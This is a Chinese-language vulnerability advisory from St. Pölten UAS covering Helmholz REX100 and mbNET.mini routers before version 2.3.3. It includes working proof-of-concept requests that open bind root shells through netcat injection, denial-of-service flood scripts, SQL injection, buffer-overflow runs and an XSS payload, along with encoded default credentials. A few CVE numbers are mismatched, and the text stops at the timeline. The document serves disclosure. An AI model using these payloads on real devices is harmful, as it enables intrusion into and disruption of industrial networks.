St. Pölten UAS 20250721-0 | Helmholz工业路由器REX100/mbNET.mini多重漏洞
| 标题 | REX100多重漏洞
| 产品 | Helmholz工业路由器REX100 / mbNET.mini
| 受影响版本 | < 2.3.3
| 修复版本 | 2.3.3
| CVE编号 | CVE-2025-41673, CVE-2025-41674, CVE-2025-41675, CVE-2025-41676, CVE-2025-41677, CVE-2025-41678, CVE-2025-41679, CVE-2025-41680, CVE-2025-41681
| 影响等级 | 高
| 主页 | https://www.helmholz.de/
| | https://mbconnectline.com/
| 发现日期 | 2025-04-25
| 发现者 | F. Bruckmoser, M. Eder, J. Heigl, M. Heudorn, G. Hofmarcher, M. Kadlec, M. Pristauz-Telsnigg, S. Resch, P. Schweinzer, M. Gschiel
| | 这些漏洞由St.Pölten UAS在研究过程中发现,由CyberDanube支持协调。
| | https://fhstp.ac.at | https://cyberdanube.com
厂商描述
“Helmholz是您自动化项目中复杂产品的专家。通过Helmholz当前巧妙的系统解决方案,可以在日益自动化的时代满足对工业网络的高要求,既可靠又高效——包括高水平的操作便利性。广泛的产品范围涵盖从分散式I/O系统到交换机和中继器、网关、NAT网关/防火墙以及安全的物联网远程机器访问。”
来源:https://www.helmholz.de/en/company/about-helmholz/
受影响版本
Helmholz工业路由器REX100 < 2.3.3
MBConnectline mbNET.mini < 2.3.3
漏洞概述
-
通过send_sms的认证命令注入 (CVE-2025-41674)
在设备的send_sms功能中发现命令注入漏洞。认证攻击者可利用此问题以root权限在设备上执行任意命令。
-
通过diag的认证命令注入 (CVE-2025-41673)
在设备的diag功能中发现命令注入漏洞。认证攻击者可利用此问题以root权限在设备上执行任意命令。
-
通过communication.sh的认证命令注入 (CVE-2025-41675)
在设备的communication.sh端点中发现命令注入漏洞。认证攻击者可利用此问题以root权限在设备上执行任意命令。
-
通过send_sms的认证拒绝服务 (CVE-2025-41677)
在设备的send_sms功能中发现拒绝服务条件。认证攻击者可利用此问题使设备无响应直至重启。
-
通过send_mail的认证拒绝服务 (CVE-2025-41676)
在设备的send_mail功能中发现拒绝服务条件。认证攻击者可利用此问题使设备无响应直至重启。
-
通过cloud-status.sh的认证SQL注入 (CVE-2025-41678)
在设备的cloud-status.sh端点中发现SQL注入漏洞。认证攻击者可利用此问题读取或修改设备的sqlite数据库。
-
通过confnet/serial的未认证缓冲区溢出 (CVE-2025-41679)
在设备的confnet服务的"serial"功能中存在缓冲区溢出问题。未认证攻击者可利用此问题崩溃服务或在设备上获得远程代码执行。
-
通过confnet/command的未认证缓冲区溢出 (CVE-2025-41679)
在设备的confnet服务的"command"功能中存在缓冲区溢出问题。未认证攻击者可利用此问题崩溃服务或在设备上获得远程代码执行。
-
通过cloud-configure.sh的认证持久性XSS (CVE-2025-41681)
在设备的cloud-configure.sh端点中发现持久性XSS漏洞。认证攻击者可滥用此问题在受害者使用设备Web服务时在其浏览器中执行恶意javascript。
概念验证
1) 通过send_sms的认证命令注入 (CVE-2025-41674)
文件/cgi-bin/cloud-status.sh中的send_sms操作易受命令注入攻击。以下POST请求可用于创建文件/hello.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
POST /cgi-bin/api.sh HTTP/1.1
Host: 10.69.43.18
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: http://10.69.34.3
DNT: 1
Sec-GPC: 1
Authorization: Basic <redacted>
Connection: keep-alive
Referer: http://10.69.34.3/cgi-bin/cloud-status.sh
action=send_sms&numb='test'&text='test$(echo helloThere > /hello.txt)'
|
2) 通过diag的认证命令注入 (CVE-2025-41673)
文件/cgi-bin/cloud-status.sh中的diag操作易受命令注入攻击。以下POST请求可用于在端口8080上启动绑定shell。
1
2
3
4
5
6
7
|
POST /cgi-bin/api.sh HTTP/1.1
Host: 10.69.45.3
Content-Length: 71
Authorization: Basic <redacted>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
action=diag&operation=portcheck¶meter=-l -w 9999 -p 8080 -e /bin/sh
|
3) 通过communication.sh的认证命令注入 (CVE-2025-41675)
文件communication.sh中的nc操作易受命令注入攻击。以下GET请求可用于在端口1337上启动绑定shell。
1
2
3
|
curl 'http://192.168.0.100/cgi-bin/cloudsvr/communication.sh?action=nc¶meter=-l%20-p%201337%20-e%20%2Fbin%2Fsh' \
-H 'Authorization: Basic aGVsbWhvbHo6cm91dGVy' \
--insecure
|
4) 通过send_sms的认证拒绝服务 (CVE-2025-41676)
send_sms操作易受拒绝服务条件影响。通过发送多个请求,系统变得无响应。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
import requests
from concurrent.futures import ThreadPoolExecutor
HOST = "10.69.43.18"
PATH = "/cgi-bin/api.sh"
LENGTH = 512
ATTACKS = 1000
param = {
'action': 'send_sms',
'numb': 'X' * LENGTH,
'text': 'X' * LENGTH,
}
url = f'http://{HOST}{PATH}'
def send_request(i):
with requests.Session() as s:
s.auth = ('helmholz', 'router')
print(f'[+] - Sending Packet NR {i+1}...')
s.post(url, data=param)
with ThreadPoolExecutor(max_workers=ATTACK) as executor:
executor.map(send_request, range(ATTACKS))
|
5) 通过send_mail的认证拒绝服务 (CVE-2025-41677)
send_mail操作易受拒绝服务条件影响。通过发送多个请求,系统变得无响应。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
|
#!/usr/bin/env python3
import requests
from concurrent.futures import ThreadPoolExecutor
HOST = "10.69.43.18"
PATH = "/cgi-bin/api.sh"
LENGTH = 24
ATTACKS = 5000
param = {
'action': 'send_email',
'addr': 'X' * LENGTH,
'subj': 'X' * LENGTH,
'text': 'X' * LENGTH
}
url = f'http://{HOST}{PATH}'
def send_request(i: int) -> None:
try:
with requests.Session() as session:
session.auth = ('helmholz', 'router')
print(f'[+] Sending packet #{i + 1} ...')
session.post(url, data=param, timeout=10)
except requests.RequestException as exc:
print(f'[-] Packet #{i + 1} failed: {exc}')
def main() -> None:
with ThreadPoolExecutor(max_workers=ATTACKS) as executor:
executor.map(send_request, range(ATTACKS))
if __name__ == "__main__":
main()
|
6) 通过cloud-status.sh的认证SQL注入 (CVE-2025-41678)
在设备的cloud-status.sh端点中发现SQL注入漏洞。攻击者可利用此漏洞操纵sqlite数据库内的数据。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
POST /cgi-bin/cloud-status.sh HTTP/1.1
Host: 10.69.35.3
Content-Length: 104
Authorization: Basic aGVsbWhvbHo6cm91dGVy
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Origin: http://10.69.45.3
Referer: http://10.69.45.3/cgi-bin/cloud-status.sh
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
language=test%27%29%3B%20REPLACE%20INTO%20con-
fig%20%28name%2Cvalue%29%20VALUES%28%27hacked%27%2C%27yes
|
验证显示被操纵的数据:
1
2
|
$ echo "SELECT * FROM config WHERE name = 'hacked';" | sqlite3 /etc/db/config
hacked|yes
|
7) 通过confnet/serial的未认证缓冲区溢出 (CVE-2025-41679)
溢出位于confnet二进制文件内部。利用需要设备的序列号。与服务的交互使用了syss的脚本。
(www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-063.txt)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[+] Received response from ('192.168.0.100', 25353):
R50168542
$ python3 cve-2024-45274.py cmd
R501685420000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000 192.168.0.100 get_fw
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[!] No response received within 3 seconds.
[!] No response received within 3 seconds.
|
8) 通过confnet/command的未认证缓冲区溢出 (CVE-2025-41679)
溢出位于confnet二进制文件内部。利用需要设备的序列号。与服务的交互使用了syss的脚本。
(www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-063.txt)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[+] Received response from ('192.168.0.100', 25353):
R50168542
$ python3 cve-2024-45274.py cmd R50168542 192.168.0.100
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbccccccccccccccccccccccccccccccccccccccccccccc
ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
cccccccccccccccccccccccccccccccccccccccccccccdddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffff'
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[!] No response received within 3 seconds.
[!] No response received within 3 seconds.
|
在设备的cloud-configure.sh端点中发现持久性XSS漏洞。认证攻击者可利用此问题注入任意javascript,当访问"help"页面时执行。此漏洞的影响非常有限。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
POST /cgi-bin/cloud-status.sh HTTP/1.1
Host: 192.168.0.100
Content-Length: 250
Authorization: Basic aGVsbWhvbHo6cm91dGVy
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Accept: text/html,application/xhtml+xml,application/xml;
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Content-Disposition: form-data; name="langchange"
1
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Content-Disposition: form-data; name="language"
";alert(1)//"
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm--
|
这些漏洞通过使用MEDUSA可扩展固件运行时(https://medusa.re)在模拟设备上手动验证。
解决方案
更新到最新版本。
临时措施
限制对设备的网络访问或尽可能移除设备。
建议
St. Pölten UAS建议Helmholz客户将固件升级到最新可用版本。建议由专业公司进行安全评估。
联系时间线
2025-06-11: